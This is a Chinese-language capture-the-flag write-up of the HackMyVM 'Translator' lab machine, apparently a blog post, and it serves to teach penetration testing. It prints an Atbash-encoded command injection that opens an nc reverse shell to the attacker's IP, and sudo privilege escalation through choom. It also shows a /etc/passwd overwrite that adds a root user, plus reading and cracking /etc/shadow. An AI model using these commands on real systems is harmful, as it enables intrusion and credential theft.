translator-sudo-l

HackMyVm - Translator - YouTube
https://www.dcode.fr/cipher-identifier

translatoreasy命令执行、sudo提权、trans 提权

**后续需要虚拟机的私信我,我会打包进行文章发布链接,请持续关注!!!**

主机发现

netdiscover -i eth0 -r 192.168.44.193/24

服务探测

nmap -sV -A -T4 -p- 192.168.44.134

得到只开放了80和22端口

目录爆破

加上-e参数能带着url一起输出路径更好点击访问

gobuster dir -u http://192.168.44.134/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php -e

只是个输入框,尝试输入,发现我们输入的字符被替换了然后显示
尝试发现是26个字母倒叙替换
也可以通过https://www.dcode.fr/cipher-identifier 发现是使用atbash编码
但我直接写了个脚本

import sys

def reverse_alphabet_substitution(text):
    # 定义倒序字母映射字典
    reversed_alphabet = {
        'A': 'Z', 'B': 'Y', 'C': 'X', 'D': 'W', 'E': 'V',
        'F': 'U', 'G': 'T', 'H': 'S', 'I': 'R', 'J': 'Q',
        'K': 'P', 'L': 'O', 'M': 'N', 'N': 'M', 'O': 'L',
        'P': 'K', 'Q': 'J', 'R': 'I', 'S': 'H', 'T': 'G',
        'U': 'F', 'V': 'E', 'W': 'D', 'X': 'C', 'Y': 'B',
        'Z': 'A',
    }

    # 使用映射字典替换文本中的字母
    result = ''.join(reversed_alphabet.get(c.upper(), c) for c in text)

    return result.lower()

args = sys.argv

print(args[1])
# 示例文本
input_text = args[1]

# 应用替换函数
output_text = reverse_alphabet_substitution(input_text)

print(output_text)

命令执行nc反弹SHELL

sh -i >& /dev/tcp/ 192.168.44.128 / 9001 0>&1不行

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ python translater.py nc+-e+/bin/bash+192.168.44.128+9001
nc+-e+/bin/bash+192.168.44.128+9001
mx -v /yrm/yzhs 192.168.44.128 9001

访问`http://192.168.44.134/translate.php?hmv=rw;mx -v /yrm/yzhs 192.168.44.128 9001

刚监听的shell不太好用,使用下面这条命令打开一个pty伪终端

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm //设置终端类型为常见的xterm环境变量
stty -a//以容易阅读的方式打印当前的所有配置
stty raw -echo;fg//- 通过 `stty raw -echo` 将当前终端设置为原始模式并关闭回显。接着,使用分号 `;` 立即执行下一条命令。最后,`fg` 命令将最近放入后台的作业切换到前台运行,此时由于终端已处于原始模式且回显关闭,该作业可以直接接收用户的无干扰、未经处理的键盘输入。
reset //重新初始化终端

提权

使用sudo进行Linux权限升级技巧 - 渗透测试中心 - 博客园
配置 sudo 命令在运行时而不输入密码。 |此设置在 /etc/sudoers文件中完成,这是使用 sudo 命令的默认安全策略;在用户权限指定部分

尝试读取第一个flag读取不到cat /home/ocean/user.txt

cat hvxivg

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ python translater.py Mb+kzhhdliw+rh+zbfie3w4          
Mb+kzhhdliw+rh+zbfie3w4
ny password is ayurv3d4

利用sudo 提权到india 账号
https://gtfobins.github.io/gtfobins/choom/

su ocean //输入密码:ayurv3d4
sudo -l
//发现有个(india) NOPASSWD: /usr/bin/choom   这可以让我免密提权至india用户权限

也可以直接ssh:`ssh ocean@192.168.44.134

choom 命令是 util-linux 软件包的一部分
不会用这个命令就去找man:choom(1) - Linux manual page
Ubuntu Manpage: choom - display and adjust OOM-killer score.

sudo -u india /usr/bin/choom -n 0 /bin/sh
script /dev/null -c bash
sudo -l //(root) NOPASSWD: /usr/local/bin/trans
sudo -u root /usr/local/bin/trans//尝试以root权限运行该翻译软件
man /usr/local/bin/trans   //不会就问man,查看帮助命令

cat /etc/passwd发现可以显示,添加root用户

cat /etc/passwd
cp /etc/passwd /tmp/passwd.bak
cp /etc/passwd /tmp/file
在kali中生成一个密码
mkpasswd -m sha-512
复制值到file的最后一行中,并按照格式修改成root用户hack:$6$8NJrwgxTZMywbrec$f7JVOZGjIXI0UnN6Ovdv0kzyqiWkhqpIgBOyJOX2AHX4Z4SGuBo8D17cYAolVkVbEtNwQ75ze90uhHbIsA21a0:0:0:root:/root:/bin/bash

sudo -u root /usr/local/bin/trans -i /tmp/file -o /etc/passwd -no-auto
su hack //密码:123
root@translator:~# cat root.txt
h87M5364V2343ubvgfy
root@translator:~# cat /home/ocean/user.txt
a6765hftgnhvugy473f

方法二:
利用trans 进行提权,命令介绍:https://www.jianshu.com/p/da570df21ae8
这个是google的shell下翻译工具,所以google需要科学上网,我们在后面加上了-x代理,成功读取到shadow文件

sudo /usr/local/bin/trans -i /etc/shadow -x http://192.168.31.11:7890 -no-auto

sudo /usr/local/bin/trans -i /root/root.txt -x http://192.168.31.11:7890 -no-auto

读取后使用john 进行爆破,但是没有爆破出来。

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

也可以通过如下命令直接提权到root,反正我是不成功

sudo /usr/local/bin/trans -pager less -x http://192.168.31.11:7890
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是乙太呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值